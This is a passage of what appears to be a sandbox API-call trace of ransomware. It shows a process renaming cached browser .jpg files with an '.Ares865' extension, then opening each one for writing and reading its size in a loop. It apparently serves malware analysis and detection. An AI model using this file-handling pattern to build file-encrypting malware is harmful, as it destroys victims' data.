halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.688] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2315) returned 1 [0096.691] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg.Ares865") returned 117 [0096.691] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2452) returned 1 [0096.698] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg.Ares865") returned 117 [0096.698] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10425) returned 1 [0096.703] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg.Ares865") returned 117 [0096.703] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5997) returned 1 [0096.709] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg.Ares865") returned 117 [0096.709] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.711] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25112) returned 1 [0096.715] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg.Ares865") returned 117 [0096.715] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.716] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1882) returned 1 [0096.721] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg.Ares865") returned 117 [0096.721] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.723] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11657) returned 1 [0096.726] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg.Ares865") returned 117 [0096.726] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.727] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7734) returned 1 [0096.737] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg.Ares865") returned 117 [0096.737] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.738] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7911) returned 1 [0096.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg.Ares865") returned 117 [0096.741] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.742] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2340) returned 1 [0096.745] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg.Ares865") returned 117 [0096.745] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.747] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6499) returned 1 [0096.751] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg.Ares865") returned 117 [0096.751] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.752] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5846) returned 1 [0096.756] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg.Ares865") returned 117 [0096.756] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.757] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1966) returned 1 [0096.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg.Ares865") returned 117 [0096.760] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2420) returned 1 [0096.764] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg.Ares865") returned 117 [0096.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7783) returned 1 [0096.769] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg.Ares865") returned 117 [0096.769] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2728) returned 1 [0096.773] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg.Ares865") returned 117 [0096.773] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.775] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2426) returned 1 [0096.777] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg.Ares865") returned 117 [0096.777] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2008) returned 1 [0096.782] wsprintfW (in: 